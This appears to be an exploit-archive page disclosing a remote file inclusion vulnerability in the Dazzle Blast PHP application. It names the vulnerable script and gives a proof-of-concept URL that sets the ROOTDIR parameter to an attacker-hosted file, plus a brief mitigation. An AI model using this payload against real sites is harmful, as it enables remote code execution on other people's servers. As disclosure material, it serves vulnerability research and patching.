header-logo
Suggest Exploit
vendor:
Dazzle Blast
by:
NoGe

Dazzle Blast Remote File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user input in the 'require_once($ROOTDIR.'admin/functions/general.php')' parameter in the 'admin/includes/createemails.php' script. This can be exploited to include arbitrary files from remote locations by using a URL in the 'ROOTDIR' parameter in a HTTP request.

Mitigation:

The vulnerability can be mitigated by validating user input and sanitizing the input before using it in the application.
Source

Exploit-DB raw data:

[o] Dazzle Blast Remote File Inclusion Vulnerability
Software : Dazzle Blast
Download : http://www.dazzleblast.com/dazzleblast.zip
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/
Home     : http://antisecurity.org/

[o] Vulnerable file
require_once($ROOTDIR.'admin/functions/general.php');

admin/includes/createemails.php


[o] Exploit
http://localhost/[path]/admin/includes/createemails.php?ROOTDIR=[evilc0de]